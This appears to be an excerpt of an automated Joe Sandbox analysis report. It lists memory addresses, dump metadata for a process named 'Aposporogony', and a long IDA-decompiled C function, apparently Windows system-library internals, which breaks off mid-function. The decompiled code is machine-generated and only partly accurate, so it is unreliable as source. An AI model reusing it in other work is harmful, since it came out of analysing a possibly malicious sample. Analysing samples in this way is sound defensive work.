                                                                                                                                                                                      0x1d86f1b7
                                                                                                                                                                                      0x1d86f1b7
                                                                                                                                                                                      0x1d86f110
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f110
                                                                                                                                                                                      0x1d86f010
                                                                                                                                                                                      0x1d86f010
                                                                                                                                                                                      0x1d86f013
                                                                                                                                                                                      0x1d86f0a2
                                                                                                                                                                                      0x1d86f0a2
                                                                                                                                                                                      0x1d86f0a6
                                                                                                                                                                                      0x1d86f186
                                                                                                                                                                                      0x1d86f186
                                                                                                                                                                                      0x1d86f0ac
                                                                                                                                                                                      0x1d86f0b0
                                                                                                                                                                                      0x1d8afe56
                                                                                                                                                                                      0x1d8afe56
                                                                                                                                                                                      0x1d86f103
                                                                                                                                                                                      0x1d86f103
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f103
                                                                                                                                                                                      0x1d86f0bc
                                                                                                                                                                                      0x1d86f0c3
                                                                                                                                                                                      0x1d86f0c4
                                                                                                                                                                                      0x1d86f0c7
                                                                                                                                                                                      0x1d86f0ce
                                                                                                                                                                                      0x1d8afe35
                                                                                                                                                                                      0x1d8afe35
                                                                                                                                                                                      0x1d8afe39
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8afe41
                                                                                                                                                                                      0x1d8afe41
                                                                                                                                                                                      0x1d8afe42
                                                                                                                                                                                      0x1d8afe48
                                                                                                                                                                                      0x1d8afe51
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8afe51
                                                                                                                                                                                      0x1d86f0d4
                                                                                                                                                                                      0x1d86f0db
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f0e1
                                                                                                                                                                                      0x1d86f0e5
                                                                                                                                                                                      0x1d86f193
                                                                                                                                                                                      0x1d86f199
                                                                                                                                                                                      0x1d86f19b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f0f4
                                                                                                                                                                                      0x1d86f0f4
                                                                                                                                                                                      0x1d86f0f8
                                                                                                                                                                                      0x1d86f0fa
                                                                                                                                                                                      0x1d86f0fd
                                                                                                                                                                                      0x1d8afe1e
                                                                                                                                                                                      0x1d8afe21
                                                                                                                                                                                      0x1d8afe24
                                                                                                                                                                                      0x1d8afe27
                                                                                                                                                                                      0x1d8afe2a
                                                                                                                                                                                      0x1d8afe2d
                                                                                                                                                                                      0x1d8afe2d
                                                                                                                                                                                      0x1d86f0fd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f0f8
                                                                                                                                                                                      0x1d86f0eb
                                                                                                                                                                                      0x1d86f0ee
                                                                                                                                                                                      0x1d86f0f1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f0f1
                                                                                                                                                                                      0x1d86f01c
                                                                                                                                                                                      0x1d86f01f
                                                                                                                                                                                      0x1d86f02a
                                                                                                                                                                                      0x1d86f02d
                                                                                                                                                                                      0x1d86f030
                                                                                                                                                                                      0x1d86f034
                                                                                                                                                                                      0x1d86f036
                                                                                                                                                                                      0x1d86f039
                                                                                                                                                                                      0x1d86f045
                                                                                                                                                                                      0x1d86f051
                                                                                                                                                                                      0x1d86f05a
                                                                                                                                                                                      0x1d86f05a
                                                                                                                                                                                      0x1d86f05d
                                                                                                                                                                                      0x1d86f060
                                                                                                                                                                                      0x1d86f062
                                                                                                                                                                                      0x1d8afd59
                                                                                                                                                                                      0x1d8afd5c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8afd62
                                                                                                                                                                                      0x1d8afd66
                                                                                                                                                                                      0x1d8afd72
                                                                                                                                                                                      0x1d8afd84
                                                                                                                                                                                      0x1d8afd8a
                                                                                                                                                                                      0x1d8afd8d
                                                                                                                                                                                      0x1d8afd90
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8afd90
                                                                                                                                                                                      0x1d8afd68
                                                                                                                                                                                      0x1d8afd6c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f068
                                                                                                                                                                                      0x1d86f068
                                                                                                                                                                                      0x1d86f068
                                                                                                                                                                                      0x1d86f06d
                                                                                                                                                                                      0x1d8afd98
                                                                                                                                                                                      0x1d8afda8
                                                                                                                                                                                      0x1d8afdae
                                                                                                                                                                                      0x1d8afdae
                                                                                                                                                                                      0x1d86f073
                                                                                                                                                                                      0x1d86f078
                                                                                                                                                                                      0x1d86f07a
                                                                                                                                                                                      0x1d8afdbf
                                                                                                                                                                                      0x1d86f080
                                                                                                                                                                                      0x1d86f080
                                                                                                                                                                                      0x1d86f080
                                                                                                                                                                                      0x1d86f085
                                                                                                                                                                                      0x1d86f088
                                                                                                                                                                                      0x1d8afde1
                                                                                                                                                                                      0x1d8afde4
                                                                                                                                                                                      0x1d8afde4
                                                                                                                                                                                      0x1d86f08e
                                                                                                                                                                                      0x1d86f095
                                                                                                                                                                                      0x1d86f09d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f09d
                                                                                                                                                                                      0x1d86f062
                                                                                                                                                                                      0x1d8afd29
                                                                                                                                                                                      0x1d86f150
                                                                                                                                                                                      0x1d86f153
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f155
                                                                                                                                                                                      0x1d86ef87
                                                                                                                                                                                      0x1d86ef8a
                                                                                                                                                                                      0x1d86f136
                                                                                                                                                                                      0x1d86f13c
                                                                                                                                                                                      0x1d86f13e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86f13e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d86ef8a

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: eae182479976406c46b517d3a9996be1219ed0ac69789c8a68a821cb302847b5
                                                                                                                                                                                      • Instruction ID: 5c06bffbfd8ca22f3a329915582660e76d3621113ad70de9c90b51080077fbec
                                                                                                                                                                                      • Opcode Fuzzy Hash: eae182479976406c46b517d3a9996be1219ed0ac69789c8a68a821cb302847b5
                                                                                                                                                                                      • Instruction Fuzzy Hash: F0E10376D04648DFCB26CFA9C980A9DFBF1FF48320F10856AE556A7261D770A841CF22
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                                                      			E1D8458E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                      				char _v56;
                                                                                                                                                                                      				signed int _v60;
                                                                                                                                                                                      				signed int _v64;
                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                                                      				signed int _v84;
                                                                                                                                                                                      				char _v96;
                                                                                                                                                                                      				intOrPtr _v144;
                                                                                                                                                                                      				signed int _v160;
                                                                                                                                                                                      				signed int _v164;
                                                                                                                                                                                      				intOrPtr _v168;
                                                                                                                                                                                      				signed char _v176;
                                                                                                                                                                                      				intOrPtr _v180;
                                                                                                                                                                                      				char _v216;
                                                                                                                                                                                      				intOrPtr _v220;
                                                                                                                                                                                      				signed int _v228;
                                                                                                                                                                                      				intOrPtr* _v240;
                                                                                                                                                                                      				char _v244;
                                                                                                                                                                                      				char _v245;
                                                                                                                                                                                      				char _v246;
                                                                                                                                                                                      				char _v247;
                                                                                                                                                                                      				char _v248;
                                                                                                                                                                                      				char _v249;
                                                                                                                                                                                      				char _v250;
                                                                                                                                                                                      				char _v251;
                                                                                                                                                                                      				char _v252;
                                                                                                                                                                                      				char _v253;
                                                                                                                                                                                      				signed int _v260;
                                                                                                                                                                                      				char _v261;
                                                                                                                                                                                      				signed int _v268;
                                                                                                                                                                                      				signed int _v272;
                                                                                                                                                                                      				signed int _v276;
                                                                                                                                                                                      				signed int _v280;
                                                                                                                                                                                      				signed int _v288;
                                                                                                                                                                                      				signed int _v292;
                                                                                                                                                                                      				char _v300;
                                                                                                                                                                                      				void* _v304;
                                                                                                                                                                                      				signed int _v308;
                                                                                                                                                                                      				char _v312;
                                                                                                                                                                                      				signed int _v316;
                                                                                                                                                                                      				signed int _v320;
                                                                                                                                                                                      				signed int _v324;
                                                                                                                                                                                      				signed int _v328;
                                                                                                                                                                                      				char _v352;
                                                                                                                                                                                      				signed int* _v356;
                                                                                                                                                                                      				signed int _v360;
                                                                                                                                                                                      				signed int _v364;
                                                                                                                                                                                      				signed int _v380;
                                                                                                                                                                                      				intOrPtr _v388;
                                                                                                                                                                                      				signed int _v392;
                                                                                                                                                                                      				intOrPtr _v396;
                                                                                                                                                                                      				signed int _v400;
                                                                                                                                                                                      				signed int _v404;
                                                                                                                                                                                      				signed int _v408;
                                                                                                                                                                                      				signed int _t235;
                                                                                                                                                                                      				signed int _t236;
                                                                                                                                                                                      				intOrPtr* _t242;
                                                                                                                                                                                      				intOrPtr _t250;
                                                                                                                                                                                      				char _t253;
                                                                                                                                                                                      				char _t254;
                                                                                                                                                                                      				intOrPtr _t257;
                                                                                                                                                                                      				signed int _t261;
                                                                                                                                                                                      				intOrPtr _t262;
                                                                                                                                                                                      				char _t268;
                                                                                                                                                                                      				void* _t273;
                                                                                                                                                                                      				signed int* _t282;
                                                                                                                                                                                      				intOrPtr _t288;
                                                                                                                                                                                      				signed int* _t292;
                                                                                                                                                                                      				signed int _t293;
                                                                                                                                                                                      				signed int _t297;
                                                                                                                                                                                      				char _t298;
                                                                                                                                                                                      				intOrPtr _t309;
                                                                                                                                                                                      				signed int _t316;
                                                                                                                                                                                      				char _t317;
                                                                                                                                                                                      				signed int _t322;
                                                                                                                                                                                      				signed int _t323;
                                                                                                                                                                                      				char _t332;
                                                                                                                                                                                      				intOrPtr _t339;
                                                                                                                                                                                      				intOrPtr _t340;
                                                                                                                                                                                      				intOrPtr* _t342;
                                                                                                                                                                                      				signed int _t343;
                                                                                                                                                                                      				signed int _t356;
                                                                                                                                                                                      				signed int _t359;
                                                                                                                                                                                      				signed int _t360;
                                                                                                                                                                                      				signed int _t361;
                                                                                                                                                                                      				signed int _t366;
                                                                                                                                                                                      				intOrPtr* _t368;
                                                                                                                                                                                      				char* _t375;
                                                                                                                                                                                      				signed int _t377;
                                                                                                                                                                                      				signed int _t380;
                                                                                                                                                                                      				intOrPtr* _t384;
                                                                                                                                                                                      				signed int _t387;
                                                                                                                                                                                      				intOrPtr _t388;
                                                                                                                                                                                      				void* _t389;
                                                                                                                                                                                      				void* _t390;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t390 = __eflags;
                                                                                                                                                                                      				_t379 = __esi;
                                                                                                                                                                                      				_t341 = __ebx;
                                                                                                                                                                                      				_push(0xfffffffe);
                                                                                                                                                                                      				_push(0x1d91bd28);
                                                                                                                                                                                      				_push(E1D88AD20);
                                                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                                                      				_t388 = _t387 - 0x184;
                                                                                                                                                                                      				_t235 =  *0x1d93b370;
                                                                                                                                                                                      				_v12 = _v12 ^ _t235;
                                                                                                                                                                                      				_t236 = _t235 ^ _t387;
                                                                                                                                                                                      				_v32 = _t236;
                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                      				_push(_t236);
                                                                                                                                                                                      				 *[fs:0x0] =  &_v20;
                                                                                                                                                                                      				_v28 = _t388;
                                                                                                                                                                                      				_t377 = _a4;
                                                                                                                                                                                      				_v312 = 0;
                                                                                                                                                                                      				_v260 = _t377;
                                                                                                                                                                                      				_v250 = 0;
                                                                                                                                                                                      				_v251 = 0;
                                                                                                                                                                                      				_v247 = 0;
                                                                                                                                                                                      				_v246 = 0;
                                                                                                                                                                                      				_v252 = 0;
                                                                                                                                                                                      				_v245 = 0;
                                                                                                                                                                                      				_v248 = 0;
                                                                                                                                                                                      				_v253 = 0;
                                                                                                                                                                                      				_v304 = 0;
                                                                                                                                                                                      				_v268 = 0;
                                                                                                                                                                                      				E1D848120();
                                                                                                                                                                                      				_v292 =  *[fs:0x30];
                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                      				L1D8480BE(__ebx,  &_v312, _t377, __esi, _t390);
                                                                                                                                                                                      				_t347 =  &_v304;
                                                                                                                                                                                      				E1D848009( &_v304);
                                                                                                                                                                                      				_t242 = _v304;
                                                                                                                                                                                      				if(_t242 != 0) {
                                                                                                                                                                                      					_t347 =  &_v244;
                                                                                                                                                                                      					 *_t242 =  &_v244;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				E1D888F40( &_v244, 0, 0xd4);
                                                                                                                                                                                      				_t389 = _t388 + 0xc;
                                                                                                                                                                                      				_v8 = 1;
                                                                                                                                                                                      				_v8 = 2;
                                                                                                                                                                                      				L1D8453C0(_t377 + 0xe0);
                                                                                                                                                                                      				_v8 = 3;
                                                                                                                                                                                      				if( *((char*)(_t377 + 0xe5)) != 0) {
                                                                                                                                                                                      					_v276 = 0xc000010a;
                                                                                                                                                                                      					L73:
                                                                                                                                                                                      					_v246 = 1;
                                                                                                                                                                                      					_v247 = 1;
                                                                                                                                                                                      					L5:
                                                                                                                                                                                      					_v8 = 2;
                                                                                                                                                                                      					E1D846055(_t377);
                                                                                                                                                                                      					_t394 = _v247;
                                                                                                                                                                                      					if(_v247 != 0) {
                                                                                                                                                                                      						L67:
                                                                                                                                                                                      						_v8 = 1;
                                                                                                                                                                                      						E1D846074(_t341, _t347, _t377, _t379);
                                                                                                                                                                                      						_v8 = 0;
                                                                                                                                                                                      						E1D846179(_t379);
                                                                                                                                                                                      						_t379 = 0;
                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                      						_v276 = 0;
                                                                                                                                                                                      						_v8 = 0xfffffffe;
                                                                                                                                                                                      						_t250 = E1D87B490(_t347, _t371, 0);
                                                                                                                                                                                      						L68:
                                                                                                                                                                                      						_v300 = 0;
                                                                                                                                                                                      						L12:
                                                                                                                                                                                      						if((_v84 & 0x00000001) != 0) {
                                                                                                                                                                                      							E1D853BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v96);
                                                                                                                                                                                      							_v84 = _v84 & 0xfffffffe;
                                                                                                                                                                                      							_t250 = _v276;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t250 != 0) {
                                                                                                                                                                                      							_t253 = _t250 - 0x80;
                                                                                                                                                                                      							__eflags = _t253;
                                                                                                                                                                                      							if(_t253 == 0) {
                                                                                                                                                                                      								goto L67;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t254 = _t253 - 0x40;
                                                                                                                                                                                      							__eflags = _t254;
                                                                                                                                                                                      							if(_t254 == 0) {
                                                                                                                                                                                      								_v8 = 6;
                                                                                                                                                                                      								_t347 = 0;
                                                                                                                                                                                      								E1D8463CB(0);
                                                                                                                                                                                      								_v8 = 2;
                                                                                                                                                                                      								goto L8;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t254 != 0x42;
                                                                                                                                                                                      							if(_t254 != 0x42) {
                                                                                                                                                                                      								goto L8;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_v253 = 1;
                                                                                                                                                                                      							goto L67;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							if(_t377 != 0) {
                                                                                                                                                                                      								_t268 =  *((intOrPtr*)(_t377 + 0x110));
                                                                                                                                                                                      								__eflags = _t268;
                                                                                                                                                                                      								if(_t268 != 0) {
                                                                                                                                                                                      									L16:
                                                                                                                                                                                      									if( *((intOrPtr*)(_t377 + 0x100)) != _t268) {
                                                                                                                                                                                      										_t379 = _t377 + 0x2c;
                                                                                                                                                                                      										L1D852330(_t268, _t377 + 0x2c);
                                                                                                                                                                                      										E1D914407(_t377);
                                                                                                                                                                                      										E1D8524D0(_t377 + 0x2c);
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t371 = _v288;
                                                                                                                                                                                      									_t347 =  &_v244;
                                                                                                                                                                                      									_t273 = E1D8464F0(_t341,  &_v244, _v288, _t377, _v300, _v280, _t377,  &_v245);
                                                                                                                                                                                      									if(_t273 != 0) {
                                                                                                                                                                                      										goto L67;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										if(_v245 != _t273) {
                                                                                                                                                                                      											L8:
                                                                                                                                                                                      											_v268 = 0;
                                                                                                                                                                                      											_v64 = 0;
                                                                                                                                                                                      											_v60 = 0;
                                                                                                                                                                                      											_v56 = 0;
                                                                                                                                                                                      											_v52 = 0;
                                                                                                                                                                                      											_t341 = _v48;
                                                                                                                                                                                      											_v280 = 0x10;
                                                                                                                                                                                      											if(_t341 == 0) {
                                                                                                                                                                                      												_t257 =  *0x1d936644; // 0x0
                                                                                                                                                                                      												_v392 = _t257 + 0x300000;
                                                                                                                                                                                      												_t261 = E1D855D90(_t347,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t257 + 0x00300000 | 0x00000008, 0x1cc);
                                                                                                                                                                                      												__eflags = _t261;
                                                                                                                                                                                      												if(_t261 == 0) {
                                                                                                                                                                                      													L75:
                                                                                                                                                                                      													_v280 = 1;
                                                                                                                                                                                      													_t261 =  &_v64;
                                                                                                                                                                                      													L11:
                                                                                                                                                                                      													_v288 = _t261;
                                                                                                                                                                                      													_v300 = 0;
                                                                                                                                                                                      													_v8 = 5;
                                                                                                                                                                                      													_t262 =  *((intOrPtr*)(_t377 + 0x24));
                                                                                                                                                                                      													_v396 = _t262;
                                                                                                                                                                                      													_push( &_v96);
                                                                                                                                                                                      													_t347 =  &_v300;
                                                                                                                                                                                      													_push( &_v300);
                                                                                                                                                                                      													_push(_v280);
                                                                                                                                                                                      													_push(_v288);
                                                                                                                                                                                      													_push(_t262);
                                                                                                                                                                                      													_t250 = E1D8846E0();
                                                                                                                                                                                      													_v276 = _t250;
                                                                                                                                                                                      													_v8 = 2;
                                                                                                                                                                                      													if(_t250 != 0) {
                                                                                                                                                                                      														goto L68;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													goto L12;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t181 = _t261 + 0x1c0; // 0x1c0
                                                                                                                                                                                      												_t366 = _t181;
                                                                                                                                                                                      												 *_t366 = _t261;
                                                                                                                                                                                      												 *((intOrPtr*)(_t366 + 4)) = 1;
                                                                                                                                                                                      												 *((intOrPtr*)(_t366 + 8)) = 0x10;
                                                                                                                                                                                      												_v48 = _t366;
                                                                                                                                                                                      												_v280 = 0x10;
                                                                                                                                                                                      												goto L11;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											if( *((intOrPtr*)(_t341 + 4)) != 1) {
                                                                                                                                                                                      												goto L75;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t379 = _v48;
                                                                                                                                                                                      											E1D888F40( *_t379, 0,  *(_t379 + 8) * 8 -  *(_t379 + 8) << 2);
                                                                                                                                                                                      											_t389 = _t389 + 0xc;
                                                                                                                                                                                      											_v280 =  *(_t379 + 8);
                                                                                                                                                                                      											_t261 =  *_t341;
                                                                                                                                                                                      											goto L11;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t379 = _v64;
                                                                                                                                                                                      										if(_t379 != 0) {
                                                                                                                                                                                      											_v400 = _t379;
                                                                                                                                                                                      											_v168 =  *((intOrPtr*)(_t379 + 0x20));
                                                                                                                                                                                      											_v164 = _t379;
                                                                                                                                                                                      											_t372 =  &_v244;
                                                                                                                                                                                      											E1D846D91(_t377,  &_v244,  *((intOrPtr*)(_t379 + 0x24)),  *(_t379 + 0x28) & 0x000000ff);
                                                                                                                                                                                      											E1D846D60( &_v216);
                                                                                                                                                                                      											_v8 = 7;
                                                                                                                                                                                      											_t342 =  *((intOrPtr*)(_t379 + 0x20));
                                                                                                                                                                                      											_push( &_v56);
                                                                                                                                                                                      											_push(_v60);
                                                                                                                                                                                      											_push(_t379);
                                                                                                                                                                                      											_push( &_v216);
                                                                                                                                                                                      											__eflags = _t342 - E1D846E00;
                                                                                                                                                                                      											if(_t342 == E1D846E00) {
                                                                                                                                                                                      												E1D846E00( &_v216);
                                                                                                                                                                                      												L33:
                                                                                                                                                                                      												_v8 = 2;
                                                                                                                                                                                      												L34:
                                                                                                                                                                                      												if((_v176 & 0x00000004) != 0) {
                                                                                                                                                                                      													_v248 = 1;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_v261 = _v180 == 4;
                                                                                                                                                                                      												_v8 = 9;
                                                                                                                                                                                      												E1D8461C3( &_v216, _t372);
                                                                                                                                                                                      												_v8 = 2;
                                                                                                                                                                                      												_v228 = 0;
                                                                                                                                                                                      												if(_v248 != 0) {
                                                                                                                                                                                      													_t282 = _t377 + 8;
                                                                                                                                                                                      													_v308 = _t282;
                                                                                                                                                                                      													_t343 =  *_t282;
                                                                                                                                                                                      													_t356 = _t282[1];
                                                                                                                                                                                      													_v328 = _t343;
                                                                                                                                                                                      													_v324 = _t356;
                                                                                                                                                                                      													goto L86;
                                                                                                                                                                                      													do {
                                                                                                                                                                                      														do {
                                                                                                                                                                                      															L86:
                                                                                                                                                                                      															_t380 = _t343;
                                                                                                                                                                                      															_v272 = _t380;
                                                                                                                                                                                      															_t371 = _t356;
                                                                                                                                                                                      															_v380 = _t371;
                                                                                                                                                                                      															_v328 = (_t380 + 0x00000001 ^ _t380) & 0x0000ffff ^ _t380;
                                                                                                                                                                                      															_t379 = _v308;
                                                                                                                                                                                      															asm("lock cmpxchg8b [esi]");
                                                                                                                                                                                      															_t343 = _t380;
                                                                                                                                                                                      															_v328 = _t343;
                                                                                                                                                                                      															_t356 = _t371;
                                                                                                                                                                                      															_v324 = _t356;
                                                                                                                                                                                      															__eflags = _t343 - _v272;
                                                                                                                                                                                      														} while (_t343 != _v272);
                                                                                                                                                                                      														__eflags = _t356 - _v380;
                                                                                                                                                                                      													} while (_t356 != _v380);
                                                                                                                                                                                      													_v352 = 3;
                                                                                                                                                                                      													_push(4);
                                                                                                                                                                                      													_push( &_v352);
                                                                                                                                                                                      													_push(9);
                                                                                                                                                                                      													_push( *((intOrPtr*)(_t377 + 0x24)));
                                                                                                                                                                                      													E1D8843A0();
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_t288 =  *((intOrPtr*)(_t377 + 0x110));
                                                                                                                                                                                      													if(_t288 == 0) {
                                                                                                                                                                                      														_t288 =  *0x7ffe03c0;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													if( *((intOrPtr*)(_t377 + 0x100)) != _t288) {
                                                                                                                                                                                      														L1D852330(_t288, _t377 + 0x2c);
                                                                                                                                                                                      														E1D914407(_t377);
                                                                                                                                                                                      														E1D8524D0(_t377 + 0x2c);
                                                                                                                                                                                      													}
                                                                                                                                                                                      													_t292 = _t377 + 8;
                                                                                                                                                                                      													_v356 = _t292;
                                                                                                                                                                                      													_t379 =  *_t292;
                                                                                                                                                                                      													_t347 = _t292[1];
                                                                                                                                                                                      													_v320 = _t379;
                                                                                                                                                                                      													_v316 = _t347;
                                                                                                                                                                                      													while(1) {
                                                                                                                                                                                      														_t341 = _t379;
                                                                                                                                                                                      														_v360 = _t341;
                                                                                                                                                                                      														_t371 = _t347;
                                                                                                                                                                                      														_v364 = _t371;
                                                                                                                                                                                      														_t293 = _t341 & 0x0000ffff;
                                                                                                                                                                                      														_v308 = _t293;
                                                                                                                                                                                      														if( *((char*)(_t377 + 0xe4)) != 0) {
                                                                                                                                                                                      															goto L67;
                                                                                                                                                                                      														}
                                                                                                                                                                                      														if(_t371 != 0) {
                                                                                                                                                                                      															__eflags = _t293;
                                                                                                                                                                                      															if(_t293 < 0) {
                                                                                                                                                                                      																__eflags = _v261;
                                                                                                                                                                                      																if(_v261 == 0) {
                                                                                                                                                                                      																	goto L41;
                                                                                                                                                                                      																}
                                                                                                                                                                                      															}
                                                                                                                                                                                      															_v249 = 0;
                                                                                                                                                                                      															_v316 = _t371 - 1;
                                                                                                                                                                                      															L42:
                                                                                                                                                                                      															_t297 = _t341;
                                                                                                                                                                                      															_t341 = _t379;
                                                                                                                                                                                      															asm("lock cmpxchg8b [esi]");
                                                                                                                                                                                      															_t379 = _t297;
                                                                                                                                                                                      															_v320 = _t379;
                                                                                                                                                                                      															_t347 = _t371;
                                                                                                                                                                                      															_v316 = _t347;
                                                                                                                                                                                      															if(_t379 != _v360 || _t347 != _v364) {
                                                                                                                                                                                      																continue;
                                                                                                                                                                                      															} else {
                                                                                                                                                                                      																_t298 = _v249;
                                                                                                                                                                                      																_v245 = _t298;
                                                                                                                                                                                      																if(_t298 != 0) {
                                                                                                                                                                                      																	goto L8;
                                                                                                                                                                                      																}
                                                                                                                                                                                      																goto L20;
                                                                                                                                                                                      															}
                                                                                                                                                                                      														}
                                                                                                                                                                                      														L41:
                                                                                                                                                                                      														_v249 = 1;
                                                                                                                                                                                      														_t379 = (_v308 + 0x00000001 ^ _t341) & 0x0000ffff ^ _t341;
                                                                                                                                                                                      														_v320 = _t379;
                                                                                                                                                                                      														goto L42;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												goto L67;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags = _t342 - E1D847290;
                                                                                                                                                                                      											if(_t342 != E1D847290) {
                                                                                                                                                                                      												__eflags = _t342 - E1D845570;
                                                                                                                                                                                      												if(_t342 != E1D845570) {
                                                                                                                                                                                      													 *0x1d9391e0();
                                                                                                                                                                                      													 *_t342();
                                                                                                                                                                                      													_v8 = 2;
                                                                                                                                                                                      													goto L34;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												E1D845570( &_v216);
                                                                                                                                                                                      												goto L33;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											E1D847290();
                                                                                                                                                                                      											goto L33;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										L20:
                                                                                                                                                                                      										_push( &_v272);
                                                                                                                                                                                      										_t371 =  &_v244;
                                                                                                                                                                                      										_t347 = _t377;
                                                                                                                                                                                      										if(L1D846970(_t377,  &_v244) == 0) {
                                                                                                                                                                                      											goto L67;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										if((_v84 & 0x00000001) != 0) {
                                                                                                                                                                                      											E1D83BE18( &_v216);
                                                                                                                                                                                      											_v84 = _v84 & 0xfffffffe;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t359 = _v272;
                                                                                                                                                                                      										_v228 = _t359;
                                                                                                                                                                                      										_v168 =  *((intOrPtr*)( *_t359));
                                                                                                                                                                                      										_v164 = _t359;
                                                                                                                                                                                      										_v144 = _v220;
                                                                                                                                                                                      										_t360 =  *[fs:0x18];
                                                                                                                                                                                      										_v80 =  *((intOrPtr*)(_t360 + 0xf50));
                                                                                                                                                                                      										_v76 =  *((intOrPtr*)(_t360 + 0xf54));
                                                                                                                                                                                      										_v72 =  *((intOrPtr*)(_t360 + 0xf58));
                                                                                                                                                                                      										_v68 =  *((intOrPtr*)(_t360 + 0xf5c));
                                                                                                                                                                                      										_t309 = _v220;
                                                                                                                                                                                      										if(_t309 != 0 && ( *(_t309 + 0x10c) & 0x00000001) == 0) {
                                                                                                                                                                                      											_t372 = _v160 | 0x00000008;
                                                                                                                                                                                      											_v160 = _t372;
                                                                                                                                                                                      											_t316 =  *[fs:0x18];
                                                                                                                                                                                      											_v408 = _t316;
                                                                                                                                                                                      											if( *((intOrPtr*)(_t316 + 0xf9c)) != 0) {
                                                                                                                                                                                      												_t317 = 1;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t317 = 0;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											if(_t317 != 0) {
                                                                                                                                                                                      												_t372 = _t372 | 0x00000004;
                                                                                                                                                                                      												_v160 = _t372;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											if(E1D846929() != 0) {
                                                                                                                                                                                      												_v160 = _t372;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xa0)) + 0xc)) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                                                                                                                                                                      												_v160 = _v160 | 0x00000020;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t322 =  *[fs:0x18];
                                                                                                                                                                                      											_v404 = _t322;
                                                                                                                                                                                      											if( *((intOrPtr*)(_t322 + 0xfb8)) != 0) {
                                                                                                                                                                                      												_v160 = _v160 | 0x00000040;
